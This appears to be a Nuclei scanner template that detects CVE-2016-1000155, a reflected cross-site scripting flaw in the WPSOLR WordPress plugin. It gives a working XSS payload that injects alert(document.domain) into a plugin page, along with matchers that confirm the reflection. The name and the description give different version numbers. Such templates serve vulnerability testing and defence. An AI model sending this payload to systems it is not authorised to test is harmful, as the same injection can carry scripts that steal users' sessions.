my-nuclei-templates/CVE-2016-1000155.yaml

40 lines
1.2 KiB
YAML

id: CVE-2016-1000155
info:
name: WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin wpsolr-search-engine v7.6
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000155
- https://wordpress.org/plugins/wpsolr-search-engine
- http://www.vapidlabs.com/wp/wp_advisory.php?v=303
- http://web.archive.org/web/20210123180137/https://www.securityfocus.com/bid/93536/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000155
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200